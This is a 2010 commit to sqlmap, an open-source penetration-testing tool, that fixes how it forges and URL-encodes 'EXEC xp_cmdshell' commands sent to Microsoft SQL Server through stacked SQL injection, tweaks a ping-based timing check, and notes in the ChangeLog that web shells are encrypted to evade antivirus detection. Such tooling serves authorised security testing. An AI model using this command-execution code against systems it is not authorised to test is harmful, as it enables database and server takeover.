Major bug fix in takeover functionalities on Microsoft SQL Server

bdamele · bdamele · commit 7b8316728c10 · 2010-01-29T00:09:05.000Z
diff --git a/doc/ChangeLog b/doc/ChangeLog
@@ -42,7 +42,7 @@ sqlmap (0.8-1) stable; urgency=low
   * Added simple file encryption/compression utility, extra/cloak/cloak.py
     used by sqlmap to decrypt on the fly Churrasco executable and web
     shells consequently reduced drastically the number of anti virus
-    softwares that mistakenly mark sqlmap as a malware (Miroslav)
+    softwares that mistakenly mark sqlmap as a malware (Miroslav).
 
  -- Bernardo Damele A. G. <bernardo.damele@gmail.com>  Mon,  1 Mar 2010 10:00:00 +0000
 
diff --git a/lib/takeover/xp_cmdshell.py b/lib/takeover/xp_cmdshell.py
@@ -103,7 +103,7 @@ def __xpCmdshellConfigure(self, mode):
         self.xpCmdshellExecCmd(cmd)
 
     def __xpCmdshellCheck(self):
-        query    = self.xpCmdshellForgeCmd("ping -n %d 127.0.0.1" % (conf.timeSec + 2))
+        query    = self.xpCmdshellForgeCmd("ping -n %d 127.0.0.1" % (conf.timeSec * 2))
         duration = timeUse(query)
 
         if duration >= conf.timeSec:
@@ -112,14 +112,15 @@ def __xpCmdshellCheck(self):
             return False
 
     def xpCmdshellForgeCmd(self, cmd):
-        return "EXEC %s '%s'" % (self.xpCmdshellStr, cmd)
+        forgedCmd = "EXEC %s '%s'" % (self.xpCmdshellStr, cmd)
+        forgedCmd = urlencode(forgedCmd, convall=True)
+
+        return forgedCmd
 
     def xpCmdshellExecCmd(self, cmd, silent=False, forgeCmd=False):
         if forgeCmd:
             cmd = self.xpCmdshellForgeCmd(cmd)
 
-        cmd = urlencode(cmd, convall=True)
-
         inject.goStacked(cmd, silent)
 
     def xpCmdshellEvalCmd(self, cmd, first=None, last=None):
